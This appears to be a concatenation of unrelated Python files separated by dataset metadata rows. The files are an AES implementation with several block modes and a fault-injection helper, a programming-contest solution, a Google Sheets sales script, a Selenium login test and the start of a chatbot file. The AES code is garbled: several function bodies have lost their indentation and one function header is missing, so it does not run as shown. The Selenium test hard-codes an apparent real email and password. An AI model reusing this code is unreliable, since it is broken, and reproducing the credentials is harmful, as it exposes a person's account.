    0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,
    0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,
    0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,
    0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,
    0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,
    0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,
    0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,
    0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,
    0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,
    0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,
    0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,
    0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,
    0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F,
    0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF,
    0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61,
    0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D,
)
def sub_bytes(s):
    """SubBytes: run every byte of the 4x4 state through the S-box, in place."""
    for row in s:
        for c in range(4):
            row[c] = s_box[row[c]]
def inv_sub_bytes(s):
    """InvSubBytes: run every byte of the state through the inverse S-box, in place."""
    for row in s:
        for c in range(4):
            row[c] = inv_s_box[row[c]]
def shift_rows(s):
s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]
s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]
def inv_shift_rows(s):
s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]
s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]
def add_round_key(s, k):
    """AddRoundKey: XOR the 4x4 round-key matrix `k` into the state `s`, in place."""
    for state_row, key_row in zip(s, k):
        for c in range(4):
            state_row[c] ^= key_row[c]
# learned from http://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c
def xtime(a):
    """Multiply `a` by x (i.e. by 2) in GF(2^8), reducing by the AES polynomial 0x1B."""
    if a & 0x80:
        return ((a << 1) ^ 0x1B) & 0xFF
    return a << 1
def mix_single_column(a):
    """MixColumns on one 4-byte column, in place.

    Uses the decomposition from Sec 4.1.2 of The Design of Rijndael:
    new[i] = old[i] ^ t ^ xtime(old[i] ^ old[i+1]), where t is the XOR of
    all four bytes.
    """
    b0, b1, b2, b3 = a
    total = b0 ^ b1 ^ b2 ^ b3
    a[0] = b0 ^ total ^ xtime(b0 ^ b1)
    a[1] = b1 ^ total ^ xtime(b1 ^ b2)
    a[2] = b2 ^ total ^ xtime(b2 ^ b3)
    a[3] = b3 ^ total ^ xtime(b3 ^ b0)
def mix_columns(s):
    """MixColumns: mix every column of the 4x4 state, in place."""
    for column in s:
        mix_single_column(column)
def inv_mix_columns(s):
    """InvMixColumns, in place.

    Implements the trick from Sec 4.1.3 of The Design of Rijndael:
    pre-multiply each column by a correction matrix (built from double
    applications of xtime), then let a forward `mix_columns` finish the
    inverse transform.
    """
    for column in s:
        u = xtime(xtime(column[0] ^ column[2]))
        v = xtime(xtime(column[1] ^ column[3]))
        column[0] ^= u
        column[1] ^= v
        column[2] ^= u
        column[3] ^= v
    mix_columns(s)
# Round constants for the key schedule: successive doublings of 0x01 in
# GF(2^8) (each entry is xtime of the previous one); index 0 is unused.
r_con = (
    0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
    0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,
    0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,
    0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,
)
""" Converts a 16-byte array into a 4x4 matrix. """
return [list(text[i:i+4]) for i in range(0, len(text), 4)]
def matrix2bytes(matrix):
""" Converts a 4x4 matrix into a 16-byte array. """
return bytes(sum(matrix, []))
def xor_bytes(a, b):
""" Returns a new byte array with the elements xor'ed. """
return bytes(i^j for i, j in zip(a, b))
def inc_bytes(a):
""" Returns a new byte array with the value increment by 1 """
out = list(a)
for i in reversed(range(len(out))):
if out[i] == 0xFF:
out[i] = 0
else:
out[i] += 1
break
return bytes(out)
def pad(plaintext):
    """PKCS#7-pad `plaintext` to a multiple of 16 bytes.

    Always appends between 1 and 16 padding bytes, each equal to the pad
    length — so an exact multiple of 16 gains a whole extra block.
    """
    pad_len = 16 - len(plaintext) % 16
    return plaintext + bytes([pad_len]) * pad_len
def unpad(plaintext):
    """Strip PKCS#7 padding, asserting that it is well-formed.

    The last byte gives the pad length; every padding byte must equal it.
    Returns the unpadded message.
    """
    pad_len = plaintext[-1]
    assert pad_len > 0
    tail = plaintext[-pad_len:]
    assert all(b == pad_len for b in tail)
    return plaintext[:-pad_len]
def split_blocks(message, block_size=16, require_padding=True):
    """Split `message` into consecutive `block_size`-byte chunks.

    When `require_padding` is True (the default), `message` must be an exact
    multiple of `block_size`; otherwise the final chunk may be short.
    """
    assert len(message) % block_size == 0 or not require_padding
    # Bug fix: the slice width was hard-coded to 16 while the range stepped
    # by block_size, producing overlapping/oversized chunks whenever a
    # non-default block size was requested.
    return [message[i:i + block_size] for i in range(0, len(message), block_size)]
class AES:
"""
Class for AES-128 encryption with CBC mode and PKCS#7.
This is a raw implementation of AES, without key stretching or IV
management. Unless you need that, please use `encrypt` and `decrypt`.
"""
rounds_by_key_size = {16: 10, 24: 12, 32: 14}
def __init__(self, master_key):
"""
Initializes the object with a given key.
"""
assert len(master_key) in AES.rounds_by_key_size
self.n_rounds = AES.rounds_by_key_size[len(master_key)]
self._key_matrices = self._expand_key(master_key)
def _expand_key(self, master_key):
"""
Expands and returns a list of key matrices for the given master_key.
"""
# Initialize round keys with raw key material.
key_columns = bytes2matrix(master_key)
iteration_size = len(master_key) // 4
# Each iteration has exactly as many columns as the key material.
columns_per_iteration = len(key_columns)
i = 1
while len(key_columns) < (self.n_rounds + 1) * 4:
# Copy previous word.
word = list(key_columns[-1])
# Perform schedule_core once every "row".
if len(key_columns) % iteration_size == 0:
# Circular shift.
word.append(word.pop(0))
# Map to S-BOX.
word = [s_box[b] for b in word]
# XOR with first byte of R-CON, since the others bytes of R-CON are 0.
word[0] ^= r_con[i]
i += 1
elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:
# Run word through S-box in the fourth iteration when using a
# 256-bit key.
word = [s_box[b] for b in word]
# XOR with equivalent word from previous iteration.
word = xor_bytes(word, key_columns[-iteration_size])
key_columns.append(word)
# Group key words in 4x4 byte matrices.
return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]
def encrypt_block(self, plaintext):
"""
Encrypts a single block of 16 byte long plaintext.
"""
assert len(plaintext) == 16
plain_state = bytes2matrix(plaintext)
add_round_key(plain_state, self._key_matrices[0])
for i in range(1, self.n_rounds):
sub_bytes(plain_state)
shift_rows(plain_state)
mix_columns(plain_state)
add_round_key(plain_state, self._key_matrices[i])
sub_bytes(plain_state)
shift_rows(plain_state)
add_round_key(plain_state, self._key_matrices[-1])
return matrix2bytes(plain_state)
def encrypt_block_with_fault(self, plaintext, col, row, val=42):
assert len(plaintext) == 16
plain_state = bytes2matrix(plaintext)
add_round_key(plain_state, self._key_matrices[0])
for i in range(1, self.n_rounds - 1):
sub_bytes(plain_state)
shift_rows(plain_state)
mix_columns(plain_state)
add_round_key(plain_state, self._key_matrices[i])
sub_bytes(plain_state)
shift_rows(plain_state)
# inject the fault between the last two mix_columns
plain_state[col][row] = val
mix_columns(plain_state)
add_round_key(plain_state, self._key_matrices[self.n_rounds - 1])
sub_bytes(plain_state)
shift_rows(plain_state)
add_round_key(plain_state, self._key_matrices[-1])
return matrix2bytes(plain_state)
def decrypt_block(self, ciphertext):
"""
Decrypts a single block of 16 byte long ciphertext.
"""
assert len(ciphertext) == 16
cipher_state = bytes2matrix(ciphertext)
add_round_key(cipher_state, self._key_matrices[-1])
inv_shift_rows(cipher_state)
inv_sub_bytes(cipher_state)
for i in range(self.n_rounds - 1, 0, -1):
add_round_key(cipher_state, self._key_matrices[i])
inv_mix_columns(cipher_state)
inv_shift_rows(cipher_state)
inv_sub_bytes(cipher_state)
add_round_key(cipher_state, self._key_matrices[0])
return matrix2bytes(cipher_state)
def encrypt_cbc(self, plaintext, iv):
"""
Encrypts `plaintext` using CBC mode and PKCS#7 padding, with the given
initialization vector (iv).
"""
assert len(iv) == 16
plaintext = pad(plaintext)
blocks = []
previous = iv
for plaintext_block in split_blocks(plaintext):
# CBC mode encrypt: encrypt(plaintext_block XOR previous)
block = self.encrypt_block(xor_bytes(plaintext_block, previous))
blocks.append(block)
previous = block
return b''.join(blocks)
def decrypt_cbc(self, ciphertext, iv):
"""
Decrypts `ciphertext` using CBC mode and PKCS#7 padding, with the given
initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
previous = iv
for ciphertext_block in split_blocks(ciphertext):
# CBC mode decrypt: previous XOR decrypt(ciphertext)
blocks.append(xor_bytes(previous, self.decrypt_block(ciphertext_block)))
previous = ciphertext_block
return unpad(b''.join(blocks))
def encrypt_pcbc(self, plaintext, iv):
"""
Encrypts `plaintext` using PCBC mode and PKCS#7 padding, with the given
initialization vector (iv).
"""
assert len(iv) == 16
plaintext = pad(plaintext)
blocks = []
prev_ciphertext = iv
prev_plaintext = bytes(16)
for plaintext_block in split_blocks(plaintext):
# PCBC mode encrypt: encrypt(plaintext_block XOR (prev_ciphertext XOR prev_plaintext))
ciphertext_block = self.encrypt_block(xor_bytes(plaintext_block, xor_bytes(prev_ciphertext, prev_plaintext)))
blocks.append(ciphertext_block)
prev_ciphertext = ciphertext_block
prev_plaintext = plaintext_block
return b''.join(blocks)
def decrypt_pcbc(self, ciphertext, iv):
"""
Decrypts `ciphertext` using PCBC mode and PKCS#7 padding, with the given
initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
prev_ciphertext = iv
prev_plaintext = bytes(16)
for ciphertext_block in split_blocks(ciphertext):
# PCBC mode decrypt: (prev_plaintext XOR prev_ciphertext) XOR decrypt(ciphertext_block)
plaintext_block = xor_bytes(xor_bytes(prev_ciphertext, prev_plaintext), self.decrypt_block(ciphertext_block))
blocks.append(plaintext_block)
prev_ciphertext = ciphertext_block
prev_plaintext = plaintext_block
return unpad(b''.join(blocks))
def encrypt_cfb(self, plaintext, iv):
"""
Encrypts `plaintext` with the given initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
prev_ciphertext = iv
for plaintext_block in split_blocks(plaintext, require_padding=False):
# CFB mode encrypt: plaintext_block XOR encrypt(prev_ciphertext)
ciphertext_block = xor_bytes(plaintext_block, self.encrypt_block(prev_ciphertext))
blocks.append(ciphertext_block)
prev_ciphertext = ciphertext_block
return b''.join(blocks)
def decrypt_cfb(self, ciphertext, iv):
"""
Decrypts `ciphertext` with the given initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
prev_ciphertext = iv
for ciphertext_block in split_blocks(ciphertext, require_padding=False):
# CFB mode decrypt: ciphertext XOR decrypt(prev_ciphertext)
plaintext_block = xor_bytes(ciphertext_block, self.encrypt_block(prev_ciphertext))
blocks.append(plaintext_block)
prev_ciphertext = ciphertext_block
return b''.join(blocks)
def encrypt_ofb(self, plaintext, iv):
"""
Encrypts `plaintext` using OFB mode initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
previous = iv
for plaintext_block in split_blocks(plaintext, require_padding=False):
# OFB mode encrypt: plaintext_block XOR encrypt(previous)
block = self.encrypt_block(previous)
ciphertext_block = xor_bytes(plaintext_block, block)
blocks.append(ciphertext_block)
previous = block
return b''.join(blocks)
def decrypt_ofb(self, ciphertext, iv):
"""
Decrypts `ciphertext` using OFB mode initialization vector (iv).
"""
assert len(iv) == 16
blocks = []
previous = iv
for ciphertext_block in split_blocks(ciphertext, require_padding=False):
# OFB mode decrypt: ciphertext XOR encrypt(previous)
block = self.encrypt_block(previous)
plaintext_block = xor_bytes(ciphertext_block, block)
blocks.append(plaintext_block)
previous = block
return b''.join(blocks)
def encrypt_ctr(self, plaintext, iv):
"""
Encrypts `plaintext` using CTR mode with the given nounce/IV.
"""
assert len(iv) == 16
blocks = []
nonce = iv
for plaintext_block in split_blocks(plaintext, require_padding=False):
# CTR mode encrypt: plaintext_block XOR encrypt(nonce)
block = xor_bytes(plaintext_block, self.encrypt_block(nonce))
blocks.append(block)
nonce = inc_bytes(nonce)
return b''.join(blocks)
def decrypt_ctr(self, ciphertext, iv):
"""
Decrypts `ciphertext` using CTR mode with the given nounce/IV.
"""
assert len(iv) == 16
blocks = []
nonce = iv
for ciphertext_block in split_blocks(ciphertext, require_padding=False):
# CTR mode decrypt: ciphertext XOR encrypt(nonce)
block = xor_bytes(ciphertext_block, self.encrypt_block(nonce))
blocks.append(block)
nonce = inc_bytes(nonce)
return b''.join(blocks)
import os
from hashlib import pbkdf2_hmac
from hmac import new as new_hmac, compare_digest
# Sizes (in bytes) of the pieces that make up an encrypted message.
AES_KEY_SIZE = 16
HMAC_KEY_SIZE = 16
IV_SIZE = 16
SALT_SIZE = 16
HMAC_SIZE = 32
def get_key_iv(password, salt, workload=100000):
    """
    Stretch `password` with PBKDF2-HMAC-SHA256 (`workload` iterations) and
    split the result into (aes_key, hmac_key, iv), in that order.
    """
    material = pbkdf2_hmac('sha256', password, salt, workload,
                           AES_KEY_SIZE + IV_SIZE + HMAC_KEY_SIZE)
    aes_key = material[:AES_KEY_SIZE]
    hmac_key = material[AES_KEY_SIZE:AES_KEY_SIZE + HMAC_KEY_SIZE]
    iv = material[AES_KEY_SIZE + HMAC_KEY_SIZE:AES_KEY_SIZE + HMAC_KEY_SIZE + IV_SIZE]
    return aes_key, hmac_key, iv
def encrypt(key, plaintext, workload=100000):
    """
    Encrypt `plaintext` with `key` using AES-128-CBC, PBKDF2 key
    stretching, and an HMAC-SHA256 tag for integrity.

    Output layout: HMAC (32 bytes) || salt (16 bytes) || ciphertext.
    """
    if isinstance(key, str):
        key = key.encode('utf-8')
    if isinstance(plaintext, str):
        plaintext = plaintext.encode('utf-8')
    salt = os.urandom(SALT_SIZE)
    aes_key, hmac_key, iv = get_key_iv(key, salt, workload)
    ciphertext = AES(aes_key).encrypt_cbc(plaintext, iv)
    # The tag covers salt + ciphertext; the IV is derived from key+salt,
    # so it is implicitly authenticated too.
    tag = new_hmac(hmac_key, salt + ciphertext, 'sha256').digest()
    assert len(tag) == HMAC_SIZE
    return tag + salt + ciphertext
def decrypt(key, ciphertext, workload=100000):
    """
    Verify the HMAC on `ciphertext` and decrypt it with AES-128-CBC,
    stretching `key` with PBKDF2. Inverse of `encrypt`.
    """
    assert len(ciphertext) % 16 == 0, "Ciphertext must be made of full 16-byte blocks."
    assert len(ciphertext) >= 32, """
    Ciphertext must be at least 32 bytes long (16 byte salt + 16 byte block). To
    encrypt or decrypt single blocks use `AES(key).decrypt_block(ciphertext)`.
    """
    if isinstance(key, str):
        key = key.encode('utf-8')
    # Peel off the layout produced by encrypt(): tag || salt || body.
    tag, remainder = ciphertext[:HMAC_SIZE], ciphertext[HMAC_SIZE:]
    salt, body = remainder[:SALT_SIZE], remainder[SALT_SIZE:]
    aes_key, hmac_key, iv = get_key_iv(key, salt, workload)
    expected = new_hmac(hmac_key, salt + body, 'sha256').digest()
    # compare_digest is constant-time, avoiding a timing side channel.
    assert compare_digest(tag, expected), 'Ciphertext corrupted or tampered.'
    return AES(aes_key).decrypt_cbc(body, iv)
def benchmark():
    """Encrypt a fixed 16-byte block 30000 times to gauge raw block speed."""
    cipher = AES(b'P' * 16)
    block = b'M' * 16
    for _ in range(30000):
        cipher.encrypt_block(block)
__all__ = [encrypt, decrypt, AES]
if __name__ == '__main__':
    import sys
    write = lambda b: sys.stdout.buffer.write(b)
    read = lambda: sys.stdin.buffer.read()
    if len(sys.argv) < 2:
        # No command: show usage and run the bundled test suite.
        print('Usage: ./aes.py encrypt "key" "message"')
        print('Running tests...')
        from tests import *
        run()
    elif len(sys.argv) == 2 and sys.argv[1] == 'benchmark':
        benchmark()
        exit()
    elif len(sys.argv) == 2:
        # BUG FIX: a bare command used to fall through and crash with a
        # NameError on the undefined `text`; print usage instead.
        print('Usage: ./aes.py encrypt "key" "message"')
        exit()
    elif len(sys.argv) == 3:
        # Command + key only: the message comes from stdin.
        text = read()
    else:
        # BUG FIX: the message starts at argv[3] (argv[2] is the key); the
        # original joined argv[2:], silently prepending the key to the text.
        text = ' '.join(sys.argv[3:])
    if 'encrypt'.startswith(sys.argv[1]):
        write(encrypt(sys.argv[2], text))
    elif 'decrypt'.startswith(sys.argv[1]):
        write(decrypt(sys.argv[2], text))
    else:
        print('Expected command "encrypt" or "decrypt" in first argument.')
    # encrypt('my secret key', b'0' * 1000000) # 1 MB encrypted in 20 seconds.
| [
"nmanichon@gmail.com"
] | nmanichon@gmail.com |
b74c7a408b72582b81de14ddae925d60aa364fdf | 86cf79436659ff8d69d6d7a8d9cb358f0d1b4f1c | /AOJ/0383/0383.py | 366208a7d42f41637177a43b9108f38835ec689a | [] | no_license | pombredanne/problem-solving | d96a367851a34fb4f947b3b7a95ad364cf94ea8f | fefdbfb89ba04dbcd7df93c02968759ea970db06 | refs/heads/master | 2020-05-20T12:34:23.654253 | 2019-03-31T09:57:55 | 2019-03-31T09:57:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | A,B,X = map(int, input().split())
# Competitive-programming solution (AOJ 0383). A, B and X are read on the
# line above; presumably A is the price of a 1000-yen unit and B of a
# 500-yen unit — TODO confirm against the problem statement.
# NOTE(review): `ans` is assigned but never used.
ans = a = b = 0
# Round the target X up to the next multiple of 500.
if X % 500 != 0: X += 500 - X%500
if A < B:
    # 1000-yen units are cheapest per yen: buy ceil(X / 1000) of them.
    a = X//1000 + (1 if (X%1000>0) else 0)
elif A > 2*B:
    # Two B-units beat one A-unit: pay everything with 500-yen units.
    b = X//500
else:
    # Mixed: as many A-units as fit, then one B-unit for the remainder.
    a = X//1000; X %= 1000
    b = X//500
print(A*a + B*b)
| [
"y.watanobe@gmail.com"
] | y.watanobe@gmail.com |
a5f122ebc72de3be52ef9ee2765e9425eb204b4b | 9ea73f39ce517d412343ac3c1b602ba8b2adc3ca | /run.py | 911ff07f02a4db098ff391fab8cd22aa6b9a8352 | [] | no_license | Heyson/love-sandwiches | a9739656889b74e20ea24062b34165f14f96301b | 26ba0da0cdc7e46040438ae45b957dcb6a5c4811 | refs/heads/main | 2023-08-02T10:16:10.187736 | 2021-09-18T19:25:30 | 2021-09-18T19:25:30 | 400,629,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,948 | py | import gspread
from google.oauth2.service_account import Credentials
from pprint import pprint
# OAuth scopes the service account needs: spreadsheet plus Drive access.
SCOPE = [
    "https://www.googleapis.com/auth/spreadsheets",
    "https://www.googleapis.com/auth/drive.file",
    "https://www.googleapis.com/auth/drive"
]
# Service-account credentials are read from creds.json at import time;
# keep that file out of version control.
CREDS = Credentials.from_service_account_file('creds.json')
SCOPED_CREDS = CREDS.with_scopes(SCOPE)
GSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)
# Module-level handle to the 'love_sandwiches' spreadsheet used below.
SHEET = GSPREAD_CLIENT.open('love_sandwiches')
def get_sales_data():
    """
    Get sales figures input from the user.
    Run a while loop to collect a valid string of data from the user
    via the terminal, which must be a string of 6 numbers separated
    by commas. The loop will repeatedly request data, until it is valid.

    Returns the validated values as a list of 6 numeric strings.
    """
    # Loops forever until validate_data() accepts the input.
    while True:
        print("Please enter sales data from the last market.")
        print("Data should be six numbers, separated by commas.")
        print("Example: 10,20,30,40,50,60\n")
        data_str = input("Enter your data here: ")
        sales_data = data_str.split(",")
        if validate_data(sales_data):
            print("Data is valid!")
            break
    return sales_data
def validate_data(values):
    """
    Return True when `values` holds exactly six strings that all parse as
    integers; otherwise print the problem and return False.
    """
    try:
        # int() raises ValueError on the first non-numeric entry.
        for value in values:
            int(value)
        if len(values) != 6:
            raise ValueError(
                f"Exactly 6 values required, you provided {len(values)}"
            )
    except ValueError as err:
        print(f"Invalid data: {err}, please try again.\n")
        return False
    return True
def update_worksheet(data, worksheet):
    """
    Receives a list of integers to be inserted into a worksheet
    Update the relevant worksheet with the data provided

    `worksheet` is the tab name ("sales", "surplus" or "stock"); the row
    is appended after the last existing row.
    """
    print(f"Updating {worksheet} worksheet...\n")
    worksheet_to_update = SHEET.worksheet(worksheet)
    worksheet_to_update.append_row(data)
    print(f"{worksheet} worksheet updated successfully\n")
def calculate_surplus_data(sales_row):
    """
    Compare sales with stock and calculate the surplus for each item type.
    The surplus is defined as the sales figure subtracted from the stock:
    - Positive surplus indicates waste
    - Negative surplus indicates extra made when stock was sold out.
    """
    print("Calculating surplus data...\n")
    stock = SHEET.worksheet("stock").get_all_values()
    # The last row holds the most recent stock figures (as strings).
    stock_row = stock[-1]
    surplus_data = []
    # NOTE: the loop variable `stock` shadows the table above; harmless
    # here because the table is not used again.
    for stock, sales in zip(stock_row, sales_row):
        surplus = int(stock) - sales
        surplus_data.append(surplus)
    return surplus_data
def get_last_5_entries_sales():
    """
    Collects columns of data from sales worksheet, collecting
    the last 5 entries for each sandwich and returns the data
    as a list of lists.
    """
    sales = SHEET.worksheet("sales")
    columns = []
    # Worksheet columns are 1-indexed; columns 1-6 are the six sandwiches.
    for ind in range(1, 7):
        column = sales.col_values(ind)
        columns.append(column[-5:])
    return columns
def calculate_stock_data(data):
    """
    For each column of sales figures (lists of numeric strings), return the
    average plus 10%, rounded to the nearest integer.
    """
    print("Calculating stock data...\n")
    recommendations = []
    for column in data:
        values = [int(entry) for entry in column]
        mean = sum(values) / len(values)
        recommendations.append(round(mean * 1.1))
    return recommendations
def main():
    """
    Run all program functions

    Pipeline: collect validated sales input, append it to "sales",
    derive and append the surplus row, then recommend and append
    new stock figures.
    """
    data = get_sales_data()
    sales_data = [int(num) for num in data]
    update_worksheet(sales_data, "sales")
    new_surplus_data = calculate_surplus_data(sales_data)
    update_worksheet(new_surplus_data, "surplus")
    sales_columns = get_last_5_entries_sales()
    stock_data = calculate_stock_data(sales_columns)
    update_worksheet(stock_data, "stock")
# Script entry point (runs unconditionally on import of this module).
print("Welcome to Love Sandwiches Data Automation")
main()
| [
"hs@heysonseverino.com"
] | hs@heysonseverino.com |
e894a478cf49f5d808333ba19573bf3ba9434e8e | 13f5984be7be77852e4de29ab98d5494a7fc6767 | /Exam/商汤/环形赛道小游戏.py | cfeda51c8d56cb04a31ed5a4d36ff1e03e2acc17 | [] | no_license | YuanXianguo/Python-Interview-Master | 4252514763fc3f563d9b94e751aa873de1719f91 | 2f73786e8c51dbd248341559de171e18f67f9bf2 | refs/heads/master | 2020-11-26T18:14:50.190812 | 2019-12-20T02:18:03 | 2019-12-20T02:18:03 | 229,169,825 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | def get_sum(nums):
n = len(nums)
nums.extend(nums)
dp = [nums[0]] * len(nums)
for i in range(2 * n):
dp[i] = max(dp[i]+nums[i], nums[i])
return dp[-1]
# Read the element count, then the track values, and print the result.
n = int(input())
nums = list(map(int, input().split()))
print(get_sum(nums))
| [
"736913978@qq.com"
] | 736913978@qq.com |
33c59ff458b9621c26ce34bb6799cfbf035a6441 | 44ed35bf40532a669a40fbcab04f35e0c62b4c09 | /selenium_test_login.py | 849900c7e410733921a19a7c1717403d6aec1bd3 | [] | no_license | bekimdisha/test_repo | 2a54abdbc5ddcc00e9e97ffff268eb16225a1a4b | c1b9b67f0366854363c434e835004fd44528dd39 | refs/heads/master | 2021-01-01T16:41:40.609964 | 2017-07-21T01:46:25 | 2017-07-21T01:46:25 | 97,890,958 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,738 | py | import unittest
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
import time
import setup_logger
class TestSignUpAndLogIn(unittest.TestCase):
    """Selenium UI test: log in to weebly.com and check the resulting page title."""
    def setUp(self):
        # Per-test logger built from the project-local setup_logger module.
        self.logger_inst = setup_logger.SetupLogger()
        self.logger = self.logger_inst.setup_logger()
        # create a new Firefox session
        # NOTE(review): the comment above says Firefox, but Chrome is launched.
        self.logger.info("Test Suite Setup started!")
        self.driver = webdriver.Chrome()
        # navigate to the application home page
        self.driver.get("http://www.weebly.com/")
    def test_login(self):
        """Fill the login form, submit, and assert on the page title."""
        # NOTE(review): real-looking credentials are hard-coded below —
        # move them to environment variables / a config file.
        self.logger.info("test_login started!")
        login_url = self.driver.get("http://www.weebly.com#login")
        username = self.driver.find_element_by_id("weebly-username")
        self.logger.info('attempting to login with username bekimdisha@gmail.com')
        set_un = username.send_keys("bekimdisha@gmail.com")
        time.sleep(1)
        password = self.driver.find_element_by_id("weebly-password")
        self.logger.info('attempting to login with password !bekim123!')
        set_pass = password.send_keys("!bekim123!")
        time.sleep(1)
        login_button = self.driver.find_element_by_class_name("login-btn")
        click_login_btn = self.driver.find_element_by_class_name("login-btn").click()
        time.sleep(1)
        # NOTE(review): the except swallows the assertion, so this test can
        # never fail — it only logs a warning.
        try:
            assert 'Weebly - Getting Started' in str(self.driver.title)
        except Exception as e:
            self.logger.warn('test_login FAILED', format(e))
        self.logger.info("test_login ended!")
    def tearDown(self):
        self.logger.info("Test Suite finished. Tearning down setup!")
        self.driver.close()
# Standard unittest entry point.
if __name__ == '__main__':
    unittest.main()
| [
"bekimdisha@gmail.com"
] | bekimdisha@gmail.com |
54a92741481e50fdde73c533ad52c1b313d363a4 | cb3bce599e657188c30366adb0af3007ff9b8f96 | /src/note/test_proxy.py | bd9bcba2da944244a78ca5f41ac1a3c0cc431346 | [] | no_license | skk4/python_study | 534339e6c378d686c29af6d81429c472fca19d6d | 4bdd2a50f4bdfd28fdb89a881cb2ebb9eac26987 | refs/heads/master | 2021-01-01T04:36:52.037184 | 2017-12-08T01:04:27 | 2017-12-08T01:04:27 | 97,207,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | # -*- coding:utf-8 -*-
#import socket
import random
import urllib2
# NOTE(review): Python 2 script (urllib2, print statements) — it will not
# run under Python 3 without porting to urllib.request.
# Fetches a what-is-my-IP page through a randomly chosen HTTP proxy.
iplist = ['111.13.7.42:81']
url = 'http://www.whatismyip.com.tw/'
proxy = {'http': random.choice(iplist)}
proxy_support = urllib2.ProxyHandler(proxy)
opener = urllib2.build_opener(proxy_support)
# Spoof a desktop Chrome User-Agent so the site serves a normal page.
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36')]
urllib2.install_opener(opener)
rq = urllib2.Request(url)
print rq.get_full_url()
fd = urllib2.urlopen(rq)
print fd.read()
fd.close()
| [
"skk_4@163.com"
] | skk_4@163.com |
f4daad4a47c0fe44e54043eb0a30c4037fdaa0a7 | 901ce889543bce32bcac7bc048a0e0b39144a6de | /chatapp.py | 84be242854825f0fe10a3f4c561f29e1679db036 | [] | no_license | SiDdHaRtHrAjDaSh/hci-review3 | 6052297f70f6784664eb49e5cdeb9c9c2aac6b22 | 7efd80af199391894086a7b4fa7f4d75b60638c5 | refs/heads/main | 2023-01-04T01:11:11.668410 | 2020-11-02T13:31:25 | 2020-11-02T13:31:25 | 309,364,439 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,300 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 1 00:35:15 2020
@author: SIDDHARTH RAJ DASH
"""
import nltk
from nltk.stem import WordNetLemmatizer
